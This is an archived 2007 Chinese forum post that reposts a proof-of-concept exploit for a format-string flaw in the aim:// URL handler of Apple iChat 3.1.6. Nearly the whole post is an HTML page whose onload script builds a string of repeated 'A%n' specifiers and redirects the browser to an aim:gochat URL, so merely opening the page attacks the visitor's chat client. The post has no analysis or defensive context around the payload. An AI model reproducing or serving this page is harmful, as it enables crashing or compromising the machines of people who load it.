岁月联盟 - 技术社区 - BBS.SYUE.COM's Archiver

猪猪 发表于 2007-1-23 16:29

Apple iChat 3.1.6 v441 aim:// URL Handler Format String Exploit PoC

[code]<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
        "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
        <head>
                <title>MOAB-20-01-2007</title>
                <script>
                        function boom() {
                                var str = '';
                                for (var i = 0; i < 20; i++) {
                                    str = str + escape('A%n');
                                }
                                str = 'aim:gochat?roomname=' + str;
                                window.location = str;
                        }
                </script>
        </head>
        <body onload="boom()">
        </body>
</html>

# syue.com [2007-01-21][/code]

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.